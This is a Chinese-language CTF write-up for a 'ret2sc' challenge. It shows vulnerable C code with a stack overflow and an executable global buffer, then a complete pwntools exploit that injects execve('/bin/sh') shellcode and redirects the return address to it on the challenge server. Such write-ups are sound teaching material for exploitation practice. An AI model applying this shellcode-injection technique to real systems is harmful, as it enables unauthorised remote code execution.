題目原始碼
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
char username[0x20];
int main() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
unsigned long addr = (unsigned long)&username & ~0xfff;
mprotect((void *)addr, 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE);
char password[40];
puts("=== Welcome to ret2sc challenge ===");
puts("Please enter your username and password.");
puts("Hint: Maybe the username buffer is... *too powerful*? 🤔");
printf("Username: ");
fflush(stdout);
read(0, username, 0x20);
printf("Password: ");
fflush(stdout);
read(0, password, 0x40);
puts("Wrong username/password! Please try again.");
return 0;
}
解題
解題思路
在username構建我們的payload,在password用overflow跳到username
解題
查看保護機制
查詢username位置及password大小
objdump -M intel -d share/ret2sc |grep -A 50 "<main>"
構建payload
from pwn import *
context.arch="amd64"
host="chall.nckuctf.org"
port=28205
r=remote(host,port)
username=0x404080
sc=asm("""
mov rax,0x68732f6e69622f
push rax
mov rdi,rsp
xor rsi,rsi
xor rdx,rdx
mov rax,0x3b
syscall
""")
p=b'a'*0x38+p64(username)
r.sendlineafter(b': ',sc)
r.sendlineafter(b': ',p)
r.interactive()
r.close()
取得flag



說些什麼吧!